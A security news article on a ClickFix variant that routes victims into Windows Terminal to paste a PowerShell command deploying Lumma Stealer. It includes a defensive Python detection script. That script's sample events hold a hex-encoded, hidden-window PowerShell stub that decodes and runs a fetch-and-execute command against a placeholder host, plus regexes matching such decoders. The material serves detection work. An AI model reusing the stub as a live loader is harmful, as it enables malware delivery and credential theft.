New ClickFix Variant Abuses Windows Terminal to Bypass Run Dialog Protections and Deploy Lumma Stealer

Microsoft warns of a new ClickFix variant using Windows Terminal (wt.exe) to bypass Run dialog protections and infect systems with Lumma Stealer.

By: AXL Media

Published: Mar 10, 2026, 7:16 AM EDT

Source: The information in this article was sourced from SecurityWeek


Evolution of Social Engineering: Beyond the Run Dialog

Microsoft has issued a warning about a new variant of the "ClickFix" attack that marks a tactical shift in how malicious payloads are delivered to Windows users. Earlier ClickFix campaigns tricked users into opening the Win + R (Run) dialog and pasting a malicious PowerShell one-liner disguised as a "troubleshooting" fix or a CAPTCHA verification. The new campaign, first observed in February 2026, instead instructs victims to press Win + X and then I. Win + X opens the Windows Quick Link menu and I selects its Terminal entry, so the sequence launches Windows Terminal (wt.exe) directly. Security heuristics that specifically watch the Run dialog for suspicious input never see the command.

Mimicking Administrative Workflows to Build Trust

What Microsoft describes as the variant's main innovation is its use of a "privileged command execution environment" to appear more trustworthy. By steering users into Windows Terminal, a tool associated with IT professionals and power users, the attack blends into legitimate administrative workflows. Victims are shown fake CAPTCHA pages or troubleshooting prompts styled as official system messages. The privilege is perceived rather than real: Win + X → I opens a non-elevated Terminal (the elevated entry is Win + X → A), so the pasted command runs with the signed-in user's rights and nothing more. That is all an infostealer needs, and a user who regards the terminal as an authoritative tool is less likely to question what they are pasting into it.

Technical Execution and the Lumma Stealer Payload

Running the command triggers a multi-stage chain. The text entered into Windows Terminal spawns a PowerShell process that decodes embedded hexadecimal strings into the next stage, which installs Lumma Stealer, an infostealer that exfiltrates browser data, saved credentials and other sensitive information. The malware persists through scheduled tasks and uses anti-malware evasion routines. The variant shows how built-in Windows tools (living off the land) hide malicious activity from traditional endpoint detection. For defenders, the shift also moves the evidence: a command pasted into the Run dialog is typically recorded in the user's RunMRU registry key and its process has explorer.exe as parent, whereas a command pasted into a PowerShell prompt lands in the PSReadLine history file (ConsoleHost_history.txt) and, where script block logging is enabled, in PowerShell event 4104, and any PowerShell process it launches has Windows Terminal rather than explorer.exe in its ancestry.
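As an added illustration, not code from Microsoft, SecurityWeek or the campaign itself, the following Python triage runs those checks over constructed process-creation and script-block events. The event shapes mirror Sysmon Event ID 1 and PowerShell 4104 fields; the process-ancestry rule, the hex-blob and decoder-construct regexes, and the WindowsTerminal.exe path are assumptions; and the hex-encoded second stage is a placeholder under the reserved .invalid domain, not an indicator from the campaign.

```python
"""Triage process-creation and PowerShell script-block events for the
Windows Terminal ClickFix pattern: a PowerShell shell whose ancestry includes
Windows Terminal, plus a command carrying a hex blob and a decode/exec stub.
Every event below is constructed for this example."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Assumption: wt.exe is only the launcher alias; the long-lived process that
# hosts the shell is WindowsTerminal.exe (OpenConsole.exe is its conpty host).
TERMINAL_PARENTS = {"wt.exe", "windowsterminal.exe", "openconsole.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# 24+ consecutive hex digits: longer than any GUID segment (max 12), so
# ordinary installer or task command lines do not trip it.
HEX_BLOB = re.compile(r"(?<![0-9A-Fa-f])[0-9A-Fa-f]{24,}(?![0-9A-Fa-f])")
# Constructs a PowerShell stub needs to turn hex back into text and run it.
DECODE_HINTS = re.compile(r"\[char\]|\[convert\]|tochar\(|\biex\b|invoke-expression", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_hex_blobs(text: str) -> list[str]:
    """Plaintext of every even-length hex run that decodes to printable ASCII,
    so the analyst sees the staged command instead of the blob."""
    found = []
    for blob in HEX_BLOB.findall(text):
        if len(blob) % 2:
            continue
        raw = bytes.fromhex(blob)
        if all(32 <= b < 127 for b in raw):
            found.append(raw.decode("ascii"))
    return found


def build_process_table(events: list[dict]) -> dict[int, dict]:
    return {e["ProcessId"]: e for e in events if e["kind"] == "process"}


def ancestry(pid: int, table: dict[int, dict]) -> list[str]:
    """Image basenames from the process upward, following ParentProcessId links
    and falling back to ParentImage where the parent's own event is missing."""
    chain, seen = [], set()
    while pid in table and pid not in seen:
        seen.add(pid)
        ev = table[pid]
        chain.append(basename(ev["Image"]))
        pid = ev["ParentProcessId"]
        if pid not in table:
            chain.append(basename(ev["ParentImage"]))
    return chain


@dataclass
class Finding:
    event_id: str
    from_terminal: bool = False
    hex_decoder: bool = False
    decoded: list[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # Terminal ancestry alone is normal use; the decoder stub is the alert.
        if self.hex_decoder:
            return "alert"
        return "context" if self.from_terminal else "none"


def triage(event: dict, table: dict[int, dict]) -> Finding:
    f = Finding(event["id"])
    if event["kind"] == "process":            # Sysmon Event ID 1 style fields
        chain = ancestry(event["ProcessId"], table)
        f.from_terminal = chain[0] in SHELLS and any(a in TERMINAL_PARENTS for a in chain[1:])
        text = event.get("CommandLine", "")
    else:                                      # PowerShell 4104: the pasted text itself
        text = event["ScriptBlockText"]
    f.hex_decoder = bool(HEX_BLOB.search(text) and DECODE_HINTS.search(text))
    f.decoded = decode_hex_blobs(text)
    return f


# --- constructed sample telemetry -------------------------------------------
STAGE2 = "irm http://stage.example.invalid/x | iex"      # placeholder, reserved TLD
DECODER = ("$h='" + STAGE2.encode().hex() + "';"
           "iex (-join ($h -split '(..)' | ? {$_} | % {[char][convert]::ToInt32($_,16)}))")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WT = r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe"  # illustrative path
SAMPLE_EVENTS = [
    # e1: Win+X, I opened a shell in Windows Terminal; nothing pasted yet.
    {"id": "e1", "kind": "process", "ProcessId": 100, "ParentProcessId": 50,
     "ParentImage": WT, "Image": PS, "CommandLine": "powershell.exe"},
    # e2: the pasted ClickFix text re-launches PowerShell with the hex decoder stub.
    {"id": "e2", "kind": "process", "ProcessId": 200, "ParentProcessId": 100,
     "ParentImage": PS, "Image": PS, "CommandLine": 'powershell -w hidden -c "' + DECODER + '"'},
    # e3: the same stub pasted straight into the interactive prompt: no new
    # process, only a script block log entry.
    {"id": "e3", "kind": "scriptblock", "ScriptBlockText": DECODER},
    # e4: an admin task carrying a GUID: hex present but short, no decoder.
    {"id": "e4", "kind": "process", "ProcessId": 300, "ParentProcessId": 10,
     "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\scripts\backup.ps1 -Job {0A1B2C3D-4E5F-6A7B-8C9D-0E1F2A3B4C5D}"},
]


def run_triage(events: list[dict] | None = None) -> dict[str, Finding]:
    events = SAMPLE_EVENTS if events is None else events
    table = build_process_table(events)
    return {e["id"]: triage(e, table) for e in events}


if __name__ == "__main__":
    for eid, f in run_triage().items():
        print(f"{eid}: {f.verdict:8} terminal={f.from_terminal} decoded={f.decoded}")
```

The terminal-ancestry rule on its own only yields "context" (e1 is every legitimate Terminal session), and e3 shows why process telemetry is not enough: text pasted into an already-running prompt creates no new process, so the decoder stub only surfaces in the 4104 script block or the PSReadLine history.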
